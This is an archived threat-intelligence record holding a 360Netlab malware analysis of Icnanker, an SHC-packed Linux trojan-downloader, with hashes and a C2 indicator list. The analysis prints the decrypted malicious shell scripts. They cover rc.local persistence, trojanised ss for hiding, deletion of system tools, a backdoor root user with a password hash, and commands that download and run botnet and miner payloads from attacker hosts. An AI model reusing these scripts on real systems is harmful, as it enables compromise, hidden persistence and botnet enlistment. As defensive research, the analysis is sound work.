{
	"id": "674f62b3-8bcd-4431-afb1-afdf75d28c1f",
	"created_at": "2026-04-06T02:11:21.239434Z",
	"updated_at": "2026-04-10T03:24:18.031536Z",
	"deleted_at": null,
	"sha1_hash": "5d6bd639fdc84dffc7d763a07d7508fe489f4c42",
	"title": "Icnanker, a Linux Trojan-Downloader Protected by SHC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 340156,
	"plain_text": "Icnanker, a Linux Trojan-Downloader Protected by SHC\r\nBy Alex.Turing\r\nPublished: 2020-03-23 · Archived: 2026-04-06 01:29:53 UTC\r\nBackground\r\nOn August 15, 2019, 360Netlab Threat Detecting System flagged an unknown ELF sample\r\n(5790dedae465994d179c63782e51bac1) which generated Elknot Botnet related network traffic. We manually took a look\r\nand noticed that it is a Trojan-Downloader which utilizes \"SHC (Shell script compiler)\" technique and propgrates through\r\nweak SSH credentials. The author appeared to be an old player Icnanker. Icnanker was exposed on the Internet in 2015 as a\r\nscript programmer, who has a high-profile personality and likes to leave his QQ number and name in his codes. The\r\nsample, in our opinion, was not much new and therefore we did not bother to write anything.\r\nOn March 12, 2020, IntezerLab twittered about a Icnanker variant (6abe83ee8481b5ce0894d837eabb41df). They did not\r\ngive much details and we figured it is probably worth writing down a few interesting features that we observed.\r\nOverview\r\nIcnanker is the first Linux malware family we observed that uses SHC. Its name is derived from the author's ID \"by\r\nicnanker\" in the script.\r\nThe current Icnanker samples can be divided into 2 categories according to their functions:\r\nProtector\r\nProtector is used to protect samples from being deleted. It is currently used to protect Mining service.\r\nDownloader\r\nDownloader is mainly used to facilitate DDos and Mining attacks. Currently its samples include Elknot Botnet, Xor\r\nBotnet and XMRMiner. On Icnanker-related HFS servers, we can see that the current download volume is at\r\n20,114, and about 500 increment per day.\r\nhttps://blog.netlab.360.com/icnanker-trojan-downloader-shc-en/\r\nPage 1 of 9\n\nThe main functions of Downloader are:\r\nPersistence\r\nHide itself\r\nDelete system command\r\nAdd new users\r\nDownload and execute specific samples\r\nReverse analysis\r\nLet's take a look at the following two samples.\r\n187fa428ed44f006df0c8232be4a6e4e Miner Protector,\r\n5790dedae465994d179c63782e51bac1 Elknot Botnet Downloader.\r\nMD5:5790dedae465994d179c63782e51bac1\r\nELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.24,\r\nBuildID[sha1]=8368ecf43c311327ed1b8e011f25b87ceef7f065, stripped\r\nPacker: No\r\nVerdict:Malicious,Downloader\r\n187fa428ed44f006df0c8232be4a6e4e\r\nELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.24, stripped\r\nhttps://blog.netlab.360.com/icnanker-trojan-downloader-shc-en/\r\nPage 2 of 9\n\nPacker:No\r\nVerdict:Malicious,Protector\r\nWe know on the Windows platform, there is a technology for packaging BAT scripts into executable files, which is called\r\nBat2Exe. Similarly, on the Linux platform,there is an open source \"SHC (Shell script compiler)\" that packs shell scripts\r\ninto executable files. SHC uses the RC4 algorithm to encrypt the original script. The ELF file generated by it has very\r\nobvious characteristics: the RC4 decryption function is called a total of 14 times,and there are many unique strings.\r\nSecurity researchers can tell fairly easily whether ELF is generated by SHC.\r\nAs mentioned above, we can use the RC4 algorithm to manually extract the original script. (Another option is to use\r\nUnSHc to directly decrypt the script)\r\n[*] Extracting each args address and size for the 14 arc4() calls with address [0x8048f65]...\r\n[0] Working with var address at offset [0x80ed087] (0x2a bytes)\r\n[1] Working with var address at offset [0x80ed0df] (0x1 bytes)\r\n ...............\r\n[12] Working with var address at offset [0x80f1280] (0x13 bytes)\r\n[13] Working with var address at offset [0x80f12b1] (0x13 bytes)\r\n[*] Extracting password...\r\n[+] PWD address found : [0x80f12ed]\r\n[+] PWD size found : [0x100]\r\nhttps://blog.netlab.360.com/icnanker-trojan-downloader-shc-en/\r\nPage 3 of 9\n\n[*] Executing [/tmp/kjGnQn] to decrypt [5790dedae465994d179c63782e51bac1]\r\n[*] Retrieving initial source code in [5790dedae465994d179c63782e51bac1.sh]\r\n[*] All done!\r\n ...............\r\n[*] Executing [/tmp/GRsVsP] to decrypt [187fa428ed44f006df0c8232be4a6e4e]\r\n[*] Retrieving initial source code in [187fa428ed44f006df0c8232be4a6e4e.sh]\r\n[*] All done!\r\nProtector (187fa428ed44f006df0c8232be4a6e4e.sh)\r\n#!/bin/bash\r\ncp -f /usr/bin/chattr /usr/bin/lockr\r\ncp -f /usr/bin/chattr /usr/bin/.locks\r\ncp -f /usr/bin/.locks /usr/bin/lockr\r\nchmod 777 /usr/bin/lockr\r\nchmod 777 /usr/bin/.locks\r\nlockr +i /usr/bin/lockr \u003e/dev/null 2\u003e\u00261\r\nlockr +i /usr/bin/.locks \u003e/dev/null 2\u003e\u00261\r\n.locks -i /usr/bin/lockr;chmod 777 /usr/bin/lockr\r\nlockr +i /usr/bin/lockr \u003e/dev/null 2\u003e\u00261\r\ncp -f /usr/bin/lsattr /usr/bin/lockrc\r\ncp -f /usr/bin/lsattr /usr/bin/.locksc\r\ncp -f /usr/bin/.locksc /usr/bin/lockrc\r\nchmod 777 /usr/bin/lockrc\r\nchmod 777 /usr/bin/.locksc\r\nlockr +i /usr/bin/lockrc \u003e/dev/null 2\u003e\u00261\r\nlockr +i /usr/bin/.locksc \u003e/dev/null 2\u003e\u00261\r\n.locks -i /usr/bin/lockrc;chmod 777 /usr/bin/lockrc\r\nlockr +i /usr/bin/lockrc \u003e/dev/null 2\u003e\u00261\r\nrm -rf /usr/bin/lsattr\r\nrm -rf /usr/bin/chattr\r\nlockr +a /var/spool/cron/crontabs/root\r\nlockr +i /var/spool/cron/crontabs/root\r\nlockr +a /var/spool/cron/root\r\nlockr +i /var/spool/cron/root\r\nlockr +i /usr/lib/.cache/\r\nlockr +i /usr/lib/.cache\r\nrm -f $0\r\nIn this script, we can clearly see that the system commands chattr, lsattr are renamed and deleted, and the directory .cache,\r\nwhere mining script located,is protected, and the immutable attribute is enabled to prevent from being deleted.\r\nDownloader (5790dedae465994d179c63782e51bac1.sh)\r\n －－－－－－－－－－－－from 5790dedae465994d179c63782e51bac1.sh－－－－－－－－－－\r\n ...............\r\n echo \"byicnanker 2228668564\" \u003e $Config\r\nhttps://blog.netlab.360.com/icnanker-trojan-downloader-shc-en/\r\nPage 4 of 9\n\ntempfile=`cat $Config | awk '{print $1}'`\r\nfiletemp=\"/usr/bin/$tempfile\" #现马的路径\r\nfilename=`date +%s%N | md5sum | head -c 10`\r\nfilepath=\"/usr/bin/$filename\" #新马的路径\r\ntempbash=`cat $Config | awk '{print $2}'`\r\nbashtemp=\"/usr/bin/$tempbash\" #现脚本路径\r\nbashname=`date +%s%N | md5sum | head -c 10`\r\nbashpath=\"/usr/bin/$bashname\" #新脚本路径\r\n ...............\r\nThis section has a typical icnanker marks, we can clearly see the icnanker logo, QQ, Chinese annotations, etc.\r\nSince the script is in plain text, the functions are clear at a glance, and there are mainly 5 functions.\r\nPersistence, self-starting via re.local.\r\n # by icnanker -----------------------------------------------\r\n Repeatstart=`cat /etc/rc.local | grep 'start'| wc -l`\r\n if [ $Repeatstart != 1 ];then\r\n lockr -i /etc/rc.local;sed -i '/start/d' /etc/rc.local\r\n fi\r\n if [ -z \"`cat /etc/rc.local | grep \"$bashtemp\"`\" ]; then\r\n if [ -z \"`cat /etc/rc.local | grep \"$exit0\"`\" ]; then\r\n lockr -i /etc/;lockr -i /etc/rc.local\r\n echo \"$bashpath start\" \u003e\u003e /etc/rc.local\r\n else\r\n lockr -i /etc/;lockr -i /etc/rc.local\r\n sed -i \"s|exit 0|$bashpath start|\" /etc/rc.local\r\n echo \"exit 0\"\u003e\u003e/etc/rc.local\r\n fi\r\n fi\r\nSelf-hiding , so that management tools such as ss, ps, netstat cannot detect the process and network connections\r\nrelated to the sample.\r\nif [ -f /bin/ss ];then\r\nif [ ! -f \"$iss\" ];then\r\nif [ ! -f \"$issbak\" ];then\r\nlockr -i /usr/bin/;mkdir /usr/bin/dpkgd/\r\ncp -f /bin/ss $issbak\r\ncp -f /bin/ss $iss\r\nelse\r\ncp -f $issbak $iss\r\nfi\r\nchmod 777 $iss;chmod 777 $issbak\r\nlockr +i $issbak \u003e/dev/null 2\u003e\u00261\r\nlockr +i $iss \u003e/dev/null 2\u003e\u00261\r\nelse\r\nif [ ! -f \"$issbak\" ];then\r\nhttps://blog.netlab.360.com/icnanker-trojan-downloader-shc-en/\r\nPage 5 of 9\n\nlockr -i /usr/bin/;cp -f $iss $issbak\r\nlockr +i $issbak \u003e/dev/null 2\u003e\u00261\r\nfi\r\nif [ -z \"`cat /bin/ss | grep $Address`\" ]; then\r\nlockr -i /bin/;lockr -i /bin/ss\r\necho '#!/bin/sh' \u003e /bin/ss\r\necho 'iss|grep -v \"'$Address'\"' \u003e\u003e /bin/ss\r\necho 'exit' \u003e\u003e /bin/ss\r\nchmod 777 /bin/ss;lockr +i /bin/ss \u003e/dev/null 2\u003e\u00261\r\nfi\r\nfi\r\nfi\r\nDelete some system files to increase the difficulty for repair.\r\nlockr -i /usr/bin/;\r\nlockr -i /usr/bin/wget;\r\nrm -f /usr/bin/wget;\r\nlockr -i /usr/bin/chattr;\r\nrm -f /usr/bin/chattr\r\nAdd new user (ntps) to facilitate subsequent control of the victim's machine\r\n # by icnanker -----------------------------------------------\r\n if [ -z \"`cat /etc/passwd|grep \"ntps\"`\" ]; then\r\n lockr -i /etc/;lockr -i /etc/passwd #ntps\r\n echo 'ntps:x:0:1:ntps:/root:/bin/bash' \u003e\u003e /etc/passwd\r\n lockr -i /etc/;lockr +i /etc/passwd \u003e/dev/null 2\u003e\u00261\r\n fi\r\n if [ -z \"`cat /etc/shadow|grep \"ntps\"`\" ]; then\r\n lockr -i /etc/;lockr -i /etc/shadow #tianyong\r\n echo 'ntps:$6$J6RdL6Xh$udhpd5iErOxXyZSERCi0NOtoXE9J095xDRo4DJfCoTEsImcxype6iltDL8pTG7w/7Gbp9Ohrii9O.4NnxqG/h.:1\r\n lockr -i /etc/;lockr +i /etc/shadow \u003e/dev/null 2\u003e\u00261\r\n fi\r\nDownload and execute specific samples, here it downloads the Elknot Botnet.\r\n # by icnanker -----------------------------------------------\r\n iptable=`iptables -L INPUT | grep \"$Address\" | grep 'ACCEPT'`\r\n if [ -z \"$iptable\" ];then\r\n iptables -I INPUT -s $Address -j ACCEPT\r\n else\r\n iptables -D INPUT -s $Address -j DROP\r\n fi\r\n process=`ips -ef | grep \"$tempfile\" | grep -v \"grep\" | wc -l`\r\n if [ $process != 1 ];then\r\n if [ ! -f \"$filebak\" ];then\r\nhttps://blog.netlab.360.com/icnanker-trojan-downloader-shc-en/\r\nPage 6 of 9\n\nlockr -i /usr/bin/;lockr -i /usr/bin/htrdpm;rm -f /usr/bin/htrdpm\r\n cd /usr/bin/;dget http[://hfs.ubtv.xyz:22345/htrdpm\r\n cd $path;mv -f /usr/bin/htrdpm $filepath\r\n else\r\n cp -f $filebak $filepath\r\n fi\r\n Runkillallconnect\r\n chmod 777 $filepath\r\n nohup $filepath \u003e/dev/null 2\u003e\u00261 \u0026\r\n fi\r\nAt this point, Icnanker will load itself when system boots and maintain continuously control of the victim secretly. At the\r\nsame time, Icnanker has pretty flexible configuration. When migrating from one service to another, the author only needs\r\nto update the dns settings in the scripts.\r\nTake the Elknot and Miner as examples\r\nelknot\r\nResolveIP=`nslookup [ddd.ubtv.xyz|grep \"Address: \"|awk '{print $2}'`\r\nif [ -z \"$ResolveIP\" ];then\r\nlockr -i /etc/;lockr -i /etc/resolv.conf\r\necho 'nameserver 114.114.114.114' \u003e /etc/resolv.conf\r\necho 'nameserver 8.8.8.8' \u003e\u003e /etc/resolv.conf\r\necho 'nameserver 8.8.4.4' \u003e\u003e /etc/resolv.conf\r\nlockr +i /etc/resolv.conf \u003e/dev/null 2\u003e\u00261\r\nservice network restart;sleep 1\r\nAddress=`nslookup ddd.ubtv.xyz|grep \"Address: \"|awk '{print $2}'`\r\nelse\r\nAddress=\"$ResolveIP\"\r\nfi\r\n dget http[://hfs.ubtv.xyz:22345/htrdpm\r\n-------------------------------------------VS----------------------------------------\r\nminer\r\nResolveIP=`nslookup p[ool.supportxmr.com|grep \"Address: \"|awk '{print $2}'`\r\nif [ -z \"$ResolveIP\" ];then\r\nlockr -i /etc/;lockr -i /etc/resolv.conf\r\necho 'nameserver 114.114.114.114' \u003e /etc/resolv.conf\r\necho 'nameserver 8.8.8.8' \u003e\u003e /etc/resolv.conf\r\necho 'nameserver 8.8.4.4' \u003e\u003e /etc/resolv.conf\r\nlockr +i /etc/resolv.conf \u003e/dev/null 2\u003e\u00261\r\nservice network restart;sleep 1\r\nAddress=`nslookup p[ool.supportxmr.com|grep \"Address: \"|awk '{print $2}'`\r\nelse\r\nAddress=\"$ResolveIP\"\r\nhttps://blog.netlab.360.com/icnanker-trojan-downloader-shc-en/\r\nPage 7 of 9\n\nfi\r\n dget http[://xz.jave.xyz:22345/.xm\r\nHere is a list of Downloader and theirs services currently we observed.\r\nfilename md5 payload type payload url\r\n80 5790dedae465994d179c63782e51bac1 elknot botnet http[://hfs.ubtv.xyz:22345/htrdpm\r\n.ds1;.ds2 6abe83ee8481b5ce0894d837eabb41df miner http[://xz.jave.xyz:22345/.xm\r\n.ssh 89cd1ebfa5757dca1286fd925e0762de elknot botnet http[://hfs.ubtv.xyz:22345/htrdpm\r\n19880 d989e81c4eb23c1e701024ed26f55849 elknot botnet http[://hfs.ubtv.xyz:22345/htrdps\r\nIcnanker's distributed samples\r\nIcnanker's distributed samples are all stored on its HFS server, and from what we have seen so far, all samples are the\r\ntypical botnet families: Elknot Botnet, Xor Botnet, and XMR mining service.\r\nElknot Botnet\r\nfilename md5 c2\r\nhtrdps 5c90bfbae5c030da91c9054ecb3194b6 ubt.ubtv.xyz:19880, jav.jave.xyz:6001\r\nkcompact0 eec19f1639871b6e6356e7ee05db8a94 sys.jave.xyz:1764, jav.jave.xyz:6001\r\nXor.DDoS Botnet\r\nfilename md5 c2\r\nss 0764da93868218d6ae999ed7bd66a98e 8uch.jave.xyz:3478,8uc1.jave.xyz:1987,8uc2.ubtv.xyz:2987\r\nMiner\r\nfilename md5 c2\r\nsh 17ac3bd2753b900367cb9ee4068fe0c1\r\n.xm 765a0899cb87400e8a27ab572f3cdd61\r\nSuggestions\r\nWe recommend that users watch for the clues we mentioned above and block the C2 on their networks,\r\nWe also suggest strong login credentials should always be enforced.\r\nReaders are always welcomed to reach us on twitter, or email to netlab at 360 dot cn.\r\nIoC list\r\nhttps://blog.netlab.360.com/icnanker-trojan-downloader-shc-en/\r\nPage 8 of 9\n\nSample MD5\r\n5790dedae465994d179c63782e51bac1\r\n6abe83ee8481b5ce0894d837eabb41df\r\n89cd1ebfa5757dca1286fd925e0762de\r\nd989e81c4eb23c1e701024ed26f55849\r\n5c90bfbae5c030da91c9054ecb3194b6\r\neec19f1639871b6e6356e7ee05db8a94\r\n0764da93868218d6ae999ed7bd66a98e\r\n17ac3bd2753b900367cb9ee4068fe0c1\r\n765a0899cb87400e8a27ab572f3cdd61\r\n187fa428ed44f006df0c8232be4a6e4e\r\nCC\r\nubt.ubtv.xyz:19880 #Elknot\r\nsys.jave.xyz:1764 #Elknot\r\njav.jave.xyz:6001 #Elknot\r\n8uch.jave.xyz:3478 #Xor.DDoS\r\n8uc1.jave.xyz:1987 #Xor.DDoS\r\n8uc2.ubtv.xyz:2987 #Xor.DDoS\r\nxz.jave.xyz:22345 #Icnanker HFS\r\nSource: https://blog.netlab.360.com/icnanker-trojan-downloader-shc-en/\r\nhttps://blog.netlab.360.com/icnanker-trojan-downloader-shc-en/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.netlab.360.com/icnanker-trojan-downloader-shc-en/"
	],
	"report_names": [
		"icnanker-trojan-downloader-shc-en"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775441481,
	"ts_updated_at": 1775791458,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5d6bd639fdc84dffc7d763a07d7508fe489f4c42.pdf",
		"text": "https://archive.orkl.eu/5d6bd639fdc84dffc7d763a07d7508fe489f4c42.txt",
		"img": "https://archive.orkl.eu/5d6bd639fdc84dffc7d763a07d7508fe489f4c42.jpg"
	}
}